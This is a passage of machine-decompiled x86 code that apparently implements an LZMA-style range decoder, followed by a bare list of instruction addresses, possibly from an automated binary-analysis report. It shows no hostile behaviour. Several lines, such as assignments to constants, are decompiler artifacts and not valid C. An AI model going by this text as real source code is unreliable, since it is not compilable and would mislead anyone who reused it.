											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00407194
0x00407194
0x00407194
0x00407194
0x0040719a
0x0040719e
0x004071a2
0x004071ac
0x004071ba
0x00407490
0x00407490
0x00407493
0x0040749a
0x004074c7
0x004074c7
0x004074cb
0x00000000
0x00000000
0x004074cd
0x004074d6
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074ff
0x00407502
0x00407502
0x00407524
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074cb
0x00000000
0x00000000
0x00000000
0x00407526
0x00407526
0x0040749f
0x004074a3
0x004075db
0x004075db
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x004074a9
0x004074af
0x004074b6
0x004074be
0x004074be
0x004074c1
0x00000000
0x004074c1
0x0040752b
0x00407538
0x0040753b
0x00407447
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c03
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x0040754e
0x00000000
0x0040754e
0x00406ca8
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x0040755d
0x00000000
0x0040755d
0x00406d18
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075cf
0x00000000
0x004075cf
0x00407426
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x00000000
0x00406d5f
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00406ffe
0x00407002
0x00407020
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x0040711c
0x00407120
0x00407127
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00407122
0x00000000
0x00000000
0x00407143
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
